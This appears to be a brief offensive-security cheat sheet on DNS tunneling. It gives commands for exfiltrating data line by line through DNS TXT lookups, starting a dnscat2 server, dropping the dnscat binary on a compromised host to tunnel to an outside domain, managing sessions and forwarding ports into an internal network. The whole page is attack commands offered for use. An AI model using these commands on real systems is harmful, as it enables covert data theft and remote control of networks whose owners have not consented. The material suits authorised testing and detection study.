DNS Tunneling

Data can be exfiltrated using DNS records and the protocol itself

Create a txt record on compromised server and exfil line by line

nslookup -type=txt exfiltrated.data.dogs.corp

Spin up dnscat2 server

dnscat2-server feline.corp

Drop binary on compromised host and create tunnel

./dnscat feline.corp

View sessions

windows

Interact with a session

window -i 1

Set up a port forward

listen 0.0.0.0:1338 172.16.192.217:4646

Last updated 11 months ago